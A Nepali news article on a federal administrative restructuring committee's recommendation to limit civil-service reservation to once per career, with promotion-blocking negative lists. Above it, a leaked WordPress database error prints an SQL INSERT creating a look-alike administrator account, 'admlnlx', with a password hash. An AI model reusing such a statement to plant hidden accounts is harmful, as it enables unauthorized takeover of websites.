WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVjcnS/cl8bfB3d3MgVqHoWx1nFQ2z/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 22:16:06', '', 'admlnlx', 'admlnlx')
१ जेठ, काठमाडौं । अधिकारसम्पन्न संघीय प्रशासनिक पुनःसंरचना समितिले कर्मचारीलाई सेवा अवधिभरमा एक पटकमात्रै आरक्षण दिन सरकारलाई सिफारिस गरेको हो ।
प्रशासनविद् काशीराज दाहालको नेतृत्वमा गठित उक्त समितिले आरक्षण सुविधाको सदुपयोग हुन नसकेको ठहर गर्दै पुनरावलोकन गर्न सिफारिस गरेको हो ।
समितिको सिफारिस अनुसार आरक्षणमार्फत सरकारी सेवामा प्रवेश गरेको व्यक्तिले दोस्रो पटक फेरि आरक्षण पाउने छैन । हाल भने एउटा पदमा आरक्षणमार्फत सरकारी सेवा प्रवेश गरेके व्यक्तिले अर्को पदमा परीक्षा दिँदा पनि आरक्षण पाइरहेको थियो ।
समितिले नकारात्मक सूची मापदण्ड बनाइ यस्तो सूचीमा परेका सरकारी पदाधिकारीले बढुवाको बाटो नै रोक्न पनि सिफारिस गरेको छ ।
त्यस्तै, कर्मचारीको तहगत र श्रेणीगत संयोजन गर्नुपर्ने सुझाव दिँदै समितिले त्यसको खाकासमेत सरकारलाई दिएको छ ।
समितिले प्रशासनिक सुधारका विभिन्न सुझाव समेटेर त्यसको प्रतिवेदन सोमबार प्रधानमन्त्री केपी शर्मा ओलीसमक्ष पेश गरेको हो ।